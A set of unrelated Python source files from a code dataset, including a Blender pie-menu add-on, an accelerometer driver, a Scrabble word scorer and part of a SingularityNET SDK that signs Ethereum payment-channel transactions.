bpy.context.window_manager\n if wm.keyconfigs.addon:\n # ProportionalEditObj\n km = wm.keyconfigs.addon.keymaps.new(name='Object Mode')\n kmi = km.keymap_items.new('wm.call_menu_pie', 'O', 'PRESS')\n kmi.properties.name = \"pie.proportional_obj\"\n addon_keymaps.append((km, kmi))\n\n # ProportionalEditEdt\n km = wm.keyconfigs.addon.keymaps.new(name='Mesh')\n kmi = km.keymap_items.new('wm.call_menu_pie', 'O', 'PRESS')\n kmi.properties.name = \"pie.proportional_edt\"\n addon_keymaps.append((km, kmi))\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n if kc:\n for km, kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n addon_keymaps.clear()\n\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"engine/2.80/scripts/addons/space_view3d_pie_menus/pie_proportional_menu.py","file_name":"pie_proportional_menu.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524196033","text":"import enolib\n\nfrom tests.util import snapshot\n\ninput = '''\n> comment\n\nfield: value\n\nlist:\n- item\n\n> comment\n- item\n\nfieldset:\nentry = value\n\n> comment\nentry = value\n\ncopied_field < field\ncopied_fieldset < fieldset\ncopied_list < list\n\n# section\n\n> comment\n-- empty\n-- empty\n\n-- multiline\nvalue\nvalue\n-- multiline\n\ncopied_multiline < multiline\n\n## subsection\n## copy < subsection\n'''.strip()\n\nSNIPPET_PADDING_WIDTH = 3\nSNIPPET_PADDING = '▓' * SNIPPET_PADDING_WIDTH\n\n# The + ' ' before closing SNIPPET_PADDING represents the last cursor\n# (there is always one cursor index more than there are chars in a string)\nsnippet_input = SNIPPET_PADDING + input.replace('\\n', '⏎').replace('\\t', '⇥').replace(' ', '␣') + ' ' + SNIPPET_PADDING\n\ndef snippet(index):\n index += SNIPPET_PADDING_WIDTH\n\n return (\n snippet_input[index - SNIPPET_PADDING_WIDTH : index] +\n ' ' + snippet_input[index] + ' ' +\n snippet_input[index + 1 : index + SNIPPET_PADDING_WIDTH + 1]\n )\n\ndef test_lookup():\n column = 0\n line = 0\n\n summary = '\\nINDEX SNIPPET KEY RANGE\\n\\n'\n\n for index in range(0, len(input) + 
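# --- Illustrative sketch: the falloff operators above differ only in the
# falloff constant, so the same classes could be generated by a small
# factory. Untested inside Blender; `Operator` is the same bpy.types base
# the add-on already imports.
def make_falloff_operator(falloff):
    class FalloffOp(Operator):
        bl_idname = 'proportional_obj.' + falloff.lower()
        bl_label = 'Proportional {} Object'.format(falloff.title())
        bl_options = {'REGISTER', 'UNDO'}

        def execute(self, context):
            ts = context.tool_settings
            ts.use_proportional_edit_objects = True
            ts.proportional_edit_falloff = falloff
            return {'FINISHED'}
    FalloffOp.__name__ = 'ProportionalObj' + falloff.title()  # unique class name
    return FalloffOp

falloff_classes = [make_falloff_operator(f) for f in
                   ('SMOOTH', 'SPHERE', 'ROOT', 'SHARP',
                    'LINEAR', 'CONSTANT', 'RANDOM')]
# --- end sketch ---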
1):\n index_lookup = enolib.lookup(input, index=index)\n line_column_lookup = enolib.lookup(input, line=line, column=column)\n\n if index_lookup['range'] != line_column_lookup['range']:\n raise AssertionError(f\"Lookup by index produced a different range ({index_lookup['range']}) than by line/column ({line_column_lookup['range']})\")\n\n if index_lookup['element'].string_key() != line_column_lookup['element'].string_key():\n raise AssertionError(f\"Lookup by index produced a different key ({index_lookup['element'].string_key()}) than by line/column ({line_column_lookup['element'].string_key()})\")\n\n key = 'document' if index_lookup['element'].string_key() is None else index_lookup['element'].string_key()\n summary += f\"{str(index).ljust(5)} {snippet(index).rjust(9)} => {key.ljust(20)} {index_lookup['range']}\\n\"\n\n if index < len(input) and input[index] == '\\n':\n line += 1\n column = 0\n else:\n column += 1\n\n assert summary == snapshot(summary, 'tests/snapshots/lookup.snap.txt')\n","sub_path":"python/tests/test_lookup.py","file_name":"test_lookup.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"629030598","text":"from math import ceil\n\n\nclass Primes:\n @staticmethod\n def stream():\n n = 15490000\n primes = [True] * n\n for i in range(2, int(n ** 0.5 + 1)):\n if primes[i]:\n primes[i * 2:n:i] = [False] * (ceil(n / i) - 2)\n primes[0] = primes[1] = False\n p = (num for num, is_prime in enumerate(primes) if is_prime)\n for i in p:\n yield i\n\n\ndef verify(from_n):\n stream = Primes.stream()\n for _ in range(from_n): next(stream)\n print(next(stream))\n\n\nverify(2)\n","sub_path":"codewar/2022/3/Prime_Streaming.py","file_name":"Prime_Streaming.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461489370","text":"import os\nimport sciwing.constants as constants\nfrom typing import Dict, Union\nimport numpy as np\nfrom tqdm import tqdm\nfrom wasabi import Printer\nimport gensim\n\n\nPATHS = constants.PATHS\nEMBEDDING_CACHE_DIR = PATHS[\"EMBEDDING_CACHE_DIR\"]\n\n\nclass EmbeddingLoader:\n \"\"\"\n This handles the loading of word embeddings for a vocab\n This can handle different kinds of embeddings.\n\n \"\"\"\n\n def __init__(\n self,\n token2idx: Dict,\n embedding_type: Union[str, None] = None,\n embedding_dimension: Union[str, None] = None,\n ):\n \"\"\"\n\n :param token2idx: type: Dict\n The mapping between token2idx\n :param embedding_type: type: Union[str, None]\n \"\"\"\n self.token2idx_mapping = token2idx\n self.embedding_type = \"random\" if embedding_type is None else embedding_type\n self.embedding_dimension = embedding_dimension\n\n self.allowed_embedding_types = [\n \"glove_6B_50\",\n \"glove_6B_100\",\n \"glove_6B_200\",\n \"glove_6B_300\",\n \"random\",\n \"parscit\",\n ]\n\n assert (\n self.embedding_type in self.allowed_embedding_types\n ), \"You can use one of {0} for embedding type\".format(\n self.allowed_embedding_types\n )\n\n self.embedding_filename = self.get_preloaded_filename()\n self.vocab_embedding = {} # stores the embedding for all words in vocab\n self.msg_printer = Printer()\n\n if \"random\" in self.embedding_type:\n self.vocab_embedding = self.load_random_embedding()\n\n if \"glove\" in self.embedding_type:\n self.vocab_embedding = self.load_glove_embedding()\n\n if \"parscit\" in self.embedding_type:\n self.vocab_embedding = 
self.load_parscit_embedding()\n\n def get_preloaded_filename(self):\n filename = None\n\n if self.embedding_type == \"glove_6B_50\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.50d.txt\")\n\n elif self.embedding_type == \"glove_6B_100\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.100d.txt\")\n\n elif self.embedding_type == \"glove_6B_200\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.200d.txt\")\n\n elif self.embedding_type == \"glove_6B_300\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.300d.txt\")\n elif self.embedding_type == \"parscit\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"vectors_with_unk.kv\")\n\n return filename\n\n def load_glove_embedding(self) -> Dict[str, np.array]:\n \"\"\"\n Imports the glove embedding\n Loads the word embedding for words in the vocabulary\n If the word in the vocabulary doesnot have an embedding\n then it is loaded with zeros\n TODO: Load only once in the project and store it in json file\n - Read from json file at once\n - This might be memory expensive and save a little bit of time\n :return:\n \"\"\"\n embedding_dim = int(self.embedding_type.split(\"_\")[-1])\n glove_embeddings = {}\n with self.msg_printer.loading(\"Loading GLOVE embeddings\"):\n with open(self.embedding_filename, \"r\") as fp:\n for line in tqdm(\n fp,\n desc=\"Loading embeddings from file {0}\".format(self.embedding_type),\n ):\n values = line.split()\n word = values[0]\n embedding = np.array([float(value) for value in values[1:]])\n glove_embeddings[word] = embedding\n\n tokens = self.token2idx_mapping.keys()\n\n vocab_embeddings = {}\n\n for token in tokens:\n try:\n emb = glove_embeddings[token]\n except KeyError:\n emb = np.zeros(embedding_dim)\n\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(f\"Loaded Glove embeddings - {self.embedding_type}\")\n return vocab_embeddings\n\n def load_random_embedding(self) -> Dict[str, np.array]:\n tokens = self.token2idx_mapping.keys()\n\n vocab_embeddings = {}\n\n for token in tokens:\n emb = np.random.normal(loc=-0.1, scale=0.1, size=self.embedding_dimension)\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(\"Finished loading Random word Embedding\")\n return vocab_embeddings\n\n def load_parscit_embedding(self) -> Dict[str, np.array]:\n pretrained = gensim.models.KeyedVectors.load(self.embedding_filename, mmap=\"r\")\n tokens = self.token2idx_mapping.keys()\n vocab_embeddings = {}\n\n for token in tokens:\n try:\n emb = pretrained[token]\n except:\n emb = pretrained[\"\"]\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(\"Finished Loading Parscit Embeddings\")\n return vocab_embeddings\n","sub_path":"sciwing/vocab/embedding_loader.py","file_name":"embedding_loader.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222751450","text":"\nclass Route:\n\n def __init__(self,googleRoute,pois):\n self.google_route = googleRoute\n self.pois = pois\n self.route_with_waypoints = False\n self.scores = []\n self.final_score = 0.0\n self.final_google_route = None\n self.final_distance = 0.0\n\n def get_pois_coordinates(self):\n pois_return = []\n for poi in self.pois:\n pois_return.append((poi['latitude'],poi['longitude']))\n return pois_return\n\n def get_final_score(self):\n self.final_distance = 0.0\n for l in self.final_google_route['legs']:\n self.final_distance += l['distance']['value']\n len_pois = len(self.pois)\n sum_score = sum([x[1] for x in 
self.scores])\n        self.final_score = ((len_pois * sum_score) * 1000) / self.final_distance\n\n    def print_final_info(self, legs=False):\n        print(\"Route via \" + self.final_google_route['summary'])\n        print(\"Distance (meters): \" + str(self.final_distance))\n        print(\"Final score: \" + str(self.final_score))\n        print(\"POIs:\")\n        for p in self.pois:\n            print(p['name'])\n        if legs:\n            for l in self.final_google_route[u'legs']:\n                for s in l[u'steps']:\n                    print(s[u'html_instructions'])\n","sub_path":"model/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"382530007","text":"number = int(input(\"Enter number: \"))\nadd = 0\n\ndef sumDigit():\n    global add\n    num = number\n    while num > 0:\n        add = add + (num % 10)\n        num = num // 10\n\nsumDigit()\nprint(\"The sum of the digits in\", number, \"is\", add)\n","sub_path":"PyLesson_07/DigitAdder.py","file_name":"DigitAdder.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"541293273","text":"import time\nfrom machine import I2C\n\n\nADXL345_ADDR = 0x53\n\ni2c = I2C(0, I2C.MASTER, baudrate=100000)\n\nBW_RATE_100HZ = 0x0B\nPOWER_CTL = 0x2D\nMEASURE = 0x08\nDATA_FORMAT = 0x31\nAXES_DATA = 0x32\nBW_RATE = 0x2C\nRANGE_2G = 0x00\nSCALE_MULTIPLIER = 0.004\nEARTH_GRAVITY_MS2 = 9.80665\n\nclass ADXL345(object):\n\n\tdef __init__(self, i2c=None):\n\t\tself.i2c = i2c\n\t\tself.addr = ADXL345_ADDR\n\t\tself.setBandwidthRate(BW_RATE_100HZ)\n\t\tself.setRange(RANGE_2G)\n\t\tself.enableMeasurement()\n\n\tdef enableMeasurement(self):\n\t\t# write MEASURE into the POWER_CTL register (one register write, not two raw bus writes)\n\t\ti2c.writeto_mem(self.addr, POWER_CTL, bytes([MEASURE]))\n\n\tdef setBandwidthRate(self, rate_flag):\n\t\ti2c.writeto_mem(self.addr, BW_RATE, bytes([rate_flag]))\n\n\tdef setRange(self, range_flag):\n\t\t# read the current DATA_FORMAT byte, update the range bits and set FULL_RES, then write it back\n\t\tvalue = i2c.readfrom_mem(self.addr, DATA_FORMAT, 1)[0]\n\t\tvalue &= ~0x0F\n\t\tvalue |= range_flag\n\t\tvalue |= 0x08\n\t\ti2c.writeto_mem(self.addr, DATA_FORMAT, bytes([value]))\n\n\tdef getAxes(self, gforce=False):\n\t\tdata = i2c.readfrom_mem(self.addr, AXES_DATA, 6)\n\n\t\t# each axis is a little-endian signed 16-bit value\n\t\tx = data[0] | (data[1] << 8)\n\t\tif x & (1 << 15):\n\t\t\tx -= (1 << 16)\n\n\t\ty = data[2] | (data[3] << 8)\n\t\tif y & (1 << 15):\n\t\t\ty -= (1 << 16)\n\n\t\tz = data[4] | (data[5] << 8)\n\t\tif z & (1 << 15):\n\t\t\tz -= (1 << 16)\n\n\t\tx = x * SCALE_MULTIPLIER\n\t\ty = y * SCALE_MULTIPLIER\n\t\tz = z * SCALE_MULTIPLIER\n\n\t\tif gforce == False:\n\t\t\tx = x * EARTH_GRAVITY_MS2\n\t\t\ty = y * EARTH_GRAVITY_MS2\n\t\t\tz = z * EARTH_GRAVITY_MS2\n\n\t\treturn {\"x\": round(x, 4), \"y\": round(y, 4), \"z\": round(z, 4)}\n\nprint('Start')\n\nadxl345 = ADXL345()  # initialise the sensor once instead of on every loop iteration\nfor i in range(0, 10):\n\taxes = adxl345.getAxes(True)\n\tprint(axes['x'])\n\ttime.sleep_ms(25)  # MicroPython: sleep_ms lives in the time module\n","sub_path":"iotprojectSignapore/adxl345.py","file_name":"adxl345.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"84275018","text":"from django.test import TestCase\n\nfrom kursovaya.api import GetMaximumMark, GetMinimumMark\n\n\nclass URLTests(TestCase):\n    def test_homepage(self):\n        response = self.client.get('/')\n        self.assertEqual(response.status_code, 200)\n\n\nclass StatisticTest(TestCase):\n    def test_get_min_mark(self):\n        content = [\n            ['subject', 'mark1', 'mark2'],\n            ['sub1', '61', '78'],\n            ['sub2', '90', '92']\n        ]\n        min_mark_cmd = GetMinimumMark()\n        min_mark = min_mark_cmd.execute(content)\n        self.assertEqual(min_mark, 'sub1, 61.0, sub2, 90.0')\n\n    def test_get_max_mark(self):\n        content = [\n            ['subject', 'mark1', 'mark2'],\n            ['sub1', '61', '78'],\n            ['sub2', '90', '92']\n        ]\n        max_mark_cmd = GetMaximumMark()\n        max_mark = max_mark_cmd.execute(content)\n        self.assertEqual(max_mark, 'sub1, 78.0, sub2, 92.0')\n","sub_path":"kursovaya/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"264919397","text":"import sys\n\nclass InputValidator:\n    '''Input handling: validate the letters entered for the rack\n    and generate the permutations of those letters.'''\n\n    def inputcheck(self):\n        import re\n\n        while True:\n            your_word = input('> Enter each letter in your rack: ')\n\n            your_match = re.findall(r'[a-zA-Z]+', your_word)  # keep letters only (note: the class is [a-zA-Z]; [a-zA-z] would also match punctuation)\n            valid_word = ''\n            for i in your_match:\n                valid_word += i\n\n            # if the input passes the check, leave the loop and run the following functions;\n            # otherwise tell the user why and ask for input again\n            if valid_word == '':\n                print('Please enter letters only.')\n            elif len(valid_word) > 7:\n                print('Please enter no more than 7 letters.')\n            else:\n                break\n        return valid_word\n\n    def possible_word(self, valid_word):\n        import itertools\n\n        words = valid_word\n        counted = []\n        for i in range(2, len(words) + 1):\n            possible_word = list(itertools.permutations(words, i))  # all permutations of the input letters, lengths 2..len(words)\n            for j in possible_word:\n                j = ''.join(j)  # j is a tuple, so join it back into a string before matching. 
\n counted.append(j)\n '''\n for allowed in allowed_words: \n #print(allowed)\n #print(type(allowed))\n if j == allowed.lower():\n counted.append(j)\n ''' \n return counted\n \n\nyour_input = InputValidator()\nu_input = your_input.inputcheck()\nu_possible = your_input.possible_word(u_input)\n#print(u_input)\n#print(u_possible)\n\nclass WordValidator:\n '''this is the class used to get the valided words, \n read the 'allowed_scrabble_words.txt file to generate all allowed words, \n and then find the common words in' all allowed words' and the list of 'all the permutuations of the input letters' '''\n\n def reading(self):\n f = open('Allowed_Scrabble_words.txt','r')\n ff = f.readlines()\n f.close\n allowed_words = []\n for lines in ff:\n lines = lines.replace(' ','')\n lines = lines.replace('|','')\n lines = lines.replace('\\n','')\n count_word = lines.lower()\n allowed_words.append(count_word)\n return allowed_words\n\n def matching(self,allowed_words,counted):\n valid_word = []\n for i in counted:\n for allowed in allowed_words: \n if i == allowed.lower():\n valid_word.append(i)\n return valid_word\n\nyour_word = WordValidator()\nu_word = your_word.reading()\nu_match = your_word.matching(u_word,u_possible)\n\n#print(u_match)\n\n\n\nclass ScoreGenerator:\n '''this is the class related to calcuated scores,\n calcuate the scores, sorte them, and then write the new file'''\n \n\n def score(self,u_match): \n tile_score = {\"a\": 1, \"c\": 3, \"b\": 3, \"e\": 1, \"d\": 2, \"g\": 2,\n \"f\": 4, \"i\": 1, \"h\": 4, \"k\": 5, \"j\": 8, \"m\": 3,\n \"l\": 1, \"o\": 1, \"n\": 1, \"q\": 10, \"p\": 3, \"s\": 1,\n \"r\": 1, \"u\": 1, \"t\": 1, \"w\": 4, \"v\": 4, \"y\": 4,\n \"x\": 8, \"z\": 10}\n \n total_score = {} #create a dict to store different words, and their scores. \n for i in u_match:\n total = 0 \n for j in i:\n total += tile_score[j]\n total_score[i] = total #add k,v to the dict{total_score}\n \n return total_score\n \n\n def sorting(self,total_score):\n import json\n #sort the dict by values. \n sorted_total_score = sorted(total_score.items(), key=lambda x: x[1], reverse=True)\n filef = open('input_letter_words_sorted.txt','w')\n #filef.writelines(str(sorted_total_score))\n filef.writelines(json.dumps(sorted_total_score))\n filef.close()\n \n\nyour_score = ScoreGenerator()\nu_score = your_score.score(u_match)\nyour_score.sorting(u_score)\n\n#print(u_score)\n\n#final_score = your_score.sortinf(u_score) ----OUTPUT IS 'NONE'\n#print(final_score) ----- OUTPUT IS 'NONE' (since there is no return in the sorting() function. 
)\n#print(your_score.sorting(u_score)) ----OUTPUT IS 'NONE'\n# since sorting() has no return, the output of print(sorting) will be 'NONE', DO NOT FORGET ADD 'RETURN' FUNCTION\n\n \n\n \n\n\n \n ","sub_path":"problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"129607073","text":"import operator\nfrom functools import reduce\nimport sys\nimport os \nimport importlib\nimport json\nimport base64\nfrom pathlib import PurePath, Path\nfrom urllib.parse import urljoin\n\nimport ecdsa\nimport hashlib\nimport grpc\nimport collections\nimport web3\nfrom web3.gas_strategies.rpc import rpc_gas_price_strategy\nfrom eth_account.messages import defunct_hash_message\nfrom rfc3986 import urlparse\nimport ipfsapi\nfrom web3.utils.datastructures import AttributeDict, MutableAttributeDict\n\nimport snet_sdk.generic_client_interceptor as generic_client_interceptor\n\n__version__ = \"0.0.1\"\n\nmain_dir_path = PurePath(os.path.abspath(sys.modules['__main__'].__file__)).parent\ncur_dir = PurePath(os.path.realpath(__file__)).parent\n\n\nclass TransactionError(Exception):\n \"\"\"Raised when an Ethereum transaction receipt has a status of 0. Can provide a custom message. Optionally includes receipt\"\"\"\n def __init__(self, message, receipt=None):\n super().__init__(message)\n self.message = message\n self.receipt = receipt\n def __str__(self):\n return self.message\n\n\nclass ChannelOpenEncoder(json.JSONEncoder):\n def default(self, obj):\n if type(obj) is bytes:\n return base64.b64encode(obj).decode(\"ascii\")\n else:\n super().default(self, obj)\n\n\nclass _ClientCallDetails(\n collections.namedtuple(\n '_ClientCallDetails',\n ('method', 'timeout', 'metadata', 'credentials')),\n grpc.ClientCallDetails):\n pass\n\n\nsnet_sdk_defaults = {\n \"libraries_base_path\": \"grpc\",\n \"eth_rpc_endpoint\": \"https://kovan.infura.io\",\n \"ipfs_rpc_endpoint\": \"http://ipfs.singularitynet.io:80\",\n \"private_key\": None,\n \"signer_private_key\": None,\n \"account_index\": 0,\n \"default_gas\": 1000000,\n \"mpe_address\": None,\n \"token_address\": None,\n \"allow_transactions\": False\n}\n\n\nclass Snet:\n \"\"\"Base Snet SDK\"\"\"\n def __init__(\n self,\n config=None,\n libraries_base_path=snet_sdk_defaults[\"libraries_base_path\"],\n eth_rpc_endpoint=snet_sdk_defaults[\"eth_rpc_endpoint\"],\n ipfs_rpc_endpoint=snet_sdk_defaults[\"ipfs_rpc_endpoint\"],\n private_key=snet_sdk_defaults[\"private_key\"],\n signer_private_key=snet_sdk_defaults[\"signer_private_key\"],\n account_index=snet_sdk_defaults[\"account_index\"],\n default_gas=snet_sdk_defaults[\"default_gas\"],\n mpe_address=snet_sdk_defaults[\"mpe_address\"],\n token_address=snet_sdk_defaults[\"token_address\"],\n allow_transactions=snet_sdk_defaults[\"allow_transactions\"]\n ):\n self.libraries_base_path = libraries_base_path\n self.default_gas = default_gas\n self.allow_transactions = allow_transactions\n self.nonce = 0\n self.logs = None\n\n if private_key is not None:\n if private_key.startswith(\"0x\"):\n self.private_key = bytes(bytearray.fromhex(private_key[2:]))\n else:\n self.private_key = bytes(bytearray.fromhex(private_key))\n\n public_key = ecdsa.SigningKey.from_string(string=self.private_key,\n curve=ecdsa.SECP256k1,\n hashfunc=hashlib.sha256).get_verifying_key()\n self.address = web3.Web3.toChecksumAddress(\"0x\" + web3.Web3.sha3(hexstr=public_key.to_string().hex())[12:].hex())\n else: # Working with an unlocked 
account, for example\n            # the web3 module itself has no .eth; query the node through a temporary client\n            node = web3.Web3(web3.HTTPProvider(eth_rpc_endpoint))\n            self.address = web3.Web3.toChecksumAddress(node.eth.accounts[account_index])\n            self.private_key = None  # transactions will be signed by the node\n\n        if self.private_key is not None and signer_private_key is None:\n            self.signer_private_key = self.private_key\n        else:\n            self.signer_private_key = signer_private_key\n\n        # derive the signer address from the signer key (not the funding key)\n        signer_public_key = ecdsa.SigningKey.from_string(string=self.signer_private_key,\n                                                         curve=ecdsa.SECP256k1,\n                                                         hashfunc=hashlib.sha256).get_verifying_key()\n\n        self.signer_address = web3.Web3.toChecksumAddress(\"0x\" + web3.Web3.sha3(hexstr=signer_public_key.to_string().hex())[12:].hex())\n\n        # Instantiate Ethereum client\n        provider = web3.HTTPProvider(eth_rpc_endpoint)\n        self.web3 = web3.Web3(provider)\n        self.web3.eth.setGasPriceStrategy(rpc_gas_price_strategy)\n\n        # Get average block time for current network\n        latest = self.web3.eth.getBlock(\"latest\")\n        times = [block.timestamp for block in list(map(lambda n: self.web3.eth.getBlock(n), range(latest.number, latest.number - 20, -1)))]\n        diffs = list(map(operator.sub, times[1:], times[:-1]))\n        self.average_block_time = abs(reduce(lambda a, b: a + b, diffs) / len(diffs))\n\n        # Instantiate IPFS client\n        ipfs_rpc_endpoint = urlparse(ipfs_rpc_endpoint)\n        ipfs_scheme = ipfs_rpc_endpoint.scheme if ipfs_rpc_endpoint.scheme else \"http\"\n        ipfs_port = ipfs_rpc_endpoint.port if ipfs_rpc_endpoint.port else 5001\n        self.ipfs_client = ipfsapi.connect(urljoin(ipfs_scheme, ipfs_rpc_endpoint.hostname), ipfs_port)\n\n        # Get contract objects\n        self.mpe_contract = self._get_contract_object(\"MultiPartyEscrow.json\")\n        self.token_contract = self._get_contract_object(\"SingularityNetToken.json\")\n        self.registry_contract = self._get_contract_object(\"Registry.json\")\n\n    # Generic Eth transaction functions\n    def _get_contract_deployment_block(self, contract_file):\n        with open(cur_dir.joinpath(\"resources\", \"contracts\", \"networks\", contract_file)) as f:\n            networks = json.load(f)\n            txn_hash = networks[self.web3.version.network][\"transactionHash\"]\n        return self.web3.eth.getTransactionReceipt(txn_hash).blockNumber\n\n    def _get_nonce(self):\n        nonce = self.web3.eth.getTransactionCount(self.address)\n        if self.nonce >= nonce:\n            nonce = self.nonce + 1\n        self.nonce = nonce\n        return nonce\n\n    def _get_gas_price(self):\n        return self.web3.eth.generateGasPrice()\n\n    def _send_signed_transaction(self, contract_fn, *args):\n        transaction = contract_fn(*args).buildTransaction({\n            \"chainId\": int(self.web3.version.network),\n            \"gas\": self.default_gas,\n            \"gasPrice\": self._get_gas_price(),\n            \"nonce\": self._get_nonce()\n        })\n        signed_txn = self.web3.eth.account.signTransaction(transaction, private_key=self.private_key)\n        return self.web3.toHex(self.web3.eth.sendRawTransaction(signed_txn.rawTransaction))\n\n    def _send_transaction(self, contract_fn, *args):\n        if self.private_key is not None:\n            txn_hash = self._send_signed_transaction(contract_fn, *args)\n        else:\n            txn_hash = contract_fn(*args).transact({\n                \"gas\": self.default_gas,\n                \"gasPrice\": self._get_gas_price()  # was an undefined name (gas_price)\n            })\n        return self.web3.eth.waitForTransactionReceipt(txn_hash)\n\n    def _parse_receipt(self, receipt, event, encoder=json.JSONEncoder):\n        if receipt.status == 0:\n            raise TransactionError(\"Transaction failed\", receipt)\n        else:\n            return json.dumps(dict(event().processReceipt(receipt)[0][\"args\"]), cls=encoder)\n\n    def _update_channel_data_from_blockchain(self, channel):\n        channel_blockchain_data = self.mpe_contract.functions.channels(channel[\"channelId\"]).call()\n        channel = dict(channel)\n        channel[\"nonce\"] = channel_blockchain_data[0]\n        
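# channels() returns the raw struct from the MPE contract; slots 0, 5 and 6 hold nonce, value and expiration (inferred from this usage)\n        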
channel[\"amount\"] = channel_blockchain_data[5]\n channel[\"expiration\"] = channel_blockchain_data[6]\n return AttributeDict(channel)\n\n\n def _get_channels(self, recipient_address=None):\n topics = [self.web3.sha3(text=\"ChannelOpen(uint256,uint256,address,address,address,bytes32,uint256,uint256)\").hex()]\n if self.logs is None:\n self.logs = self.web3.eth.getLogs({\"fromBlock\" : self._get_contract_deployment_block(\"MultiPartyEscrow.json\"), \"address\": self.mpe_contract.address, \"topics\": topics})\n event_abi = {'anonymous': False, 'inputs': [{'indexed': False, 'name': 'channelId', 'type': 'uint256'}, {'indexed': False, 'name': 'nonce', 'type': 'uint256'}, {'indexed': True, 'name': 'sender', 'type': 'address'}, {'indexed': False, 'name': 'signer', 'type': 'address'}, {'indexed': True, 'name': 'recipient', 'type': 'address'}, {'indexed': True, 'name': 'groupId', 'type': 'bytes32'}, {'indexed': False, 'name': 'amount', 'type': 'uint256'}, {'indexed': False, 'name': 'expiration', 'type': 'uint256'}], 'name': 'ChannelOpen', 'type': 'event'}\n if recipient_address is None:\n channels = list(filter(lambda channel: channel.sender == self.address and channel.signer == self.signer_address, [web3.utils.events.get_event_data(event_abi, l)[\"args\"] for l in self.logs]))\n else:\n channels = list(filter(lambda channel: channel.sender == self.address and channel.signer == self.signer_address and channel.recipient == recipient_address, [web3.utils.events.get_event_data(event_abi, l)[\"args\"] for l in self.logs]))\n\n return list(map(lambda c: self._update_channel_data_from_blockchain(c), channels))\n\n\n # Contract functions \n def _token_approve_transfer(self, value):\n already_approved = self.token_contract.functions.allowance(self.address, self.mpe_contract.address).call()\n if (already_approved < value):\n self._send_transaction(self.token_contract.functions.approve, self.mpe_contract.address, value - already_approved)\n\n\n def mpe_deposit(self, value):\n self._token_approve_transfer(value)\n receipt = self._send_transaction(self.mpe_contract.functions.deposit, value)\n return self._parse_receipt(receipt, self.mpe_contract.events.DepositFunds)\n\n\n def mpe_withdraw(self, value):\n receipt = self._send_transaction(self.mpe_contract.functions.withdraw, value)\n return self._parse_receipt(receipt, self.mpe_contract.events.WithdrawFunds)\n\n\n def mpe_open_channel(self, recipient_address, group_id, value, expiration):\n receipt = self._send_transaction(self.mpe_contract.functions.openChannel, self.signer_address, recipient_address, group_id, value, expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelOpen, encoder=ChannelOpenEncoder)\n\n\n def mpe_deposit_and_open_channel(self, recipient_address, group_id, value, expiration):\n self._token_approve_transfer(value)\n receipt = self._send_transaction(self.mpe_contract.functions.depositAndOpenChannel, self.signer_address, recipient_address, group_id, value, expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelOpen, encoder=ChannelOpenEncoder)\n\n\n def mpe_channel_extend(self, channel_id, new_expiration):\n receipt = self._send_transaction(self.mpe_contract.functions.channelExtend, channel_id, new_expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelExtend)\n\n\n def mpe_channel_add_funds(self, channel_id, amount):\n receipt = self._send_transaction(self.mpe_contract.functions.channelAddFunds, channel_id, amount)\n return self._parse_receipt(receipt, 
self.mpe_contract.events.ChannelAddFunds)\n\n \n def mpe_channel_extend_and_add_funds(self, channel_id, new_expiration, amount):\n receipt = self._send_transaction(self.mpe_contract.functions.channelExtendAndAddFunds, channel_id, new_expiration, amount)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelAddFunds)\n\n\n # Generic utility functions\n def _get_contract_object(self, contract_file):\n with open(cur_dir.joinpath(\"resources\", \"contracts\", \"abi\", contract_file)) as f:\n abi = json.load(f)\n with open(cur_dir.joinpath(\"resources\", \"contracts\", \"networks\", contract_file)) as f:\n networks = json.load(f)\n address = self.web3.toChecksumAddress(networks[self.web3.version.network][\"address\"])\n return self.web3.eth.contract(abi=abi, address=address)\n\n\n def _get_base_grpc_channel(self, endpoint):\n endpoint_object = urlparse(endpoint)\n if endpoint_object.port is not None:\n channel_endpoint = endpoint_object.hostname + \":\" + str(endpoint_object.port)\n else: \n channel_endpoint = endpoint_object.hostname\n\n if endpoint_object.scheme == \"http\":\n return grpc.insecure_channel(channel_endpoint)\n elif endpoint_object.scheme == \"https\":\n return grpc.secure_channel(channel_endpoint, grpc.ssl_channel_credentials())\n else:\n raise ValueError('Unsupported scheme in service metadata (\"{}\")'.format(endpoint_object.scheme))\n\n\n # Service client\n def client(self, *args, org_id=None, service_id=None, channel_id=None):\n client = MutableAttributeDict({})\n\n # Determine org_id, service_id and channel_id for client\n _org_id = org_id\n 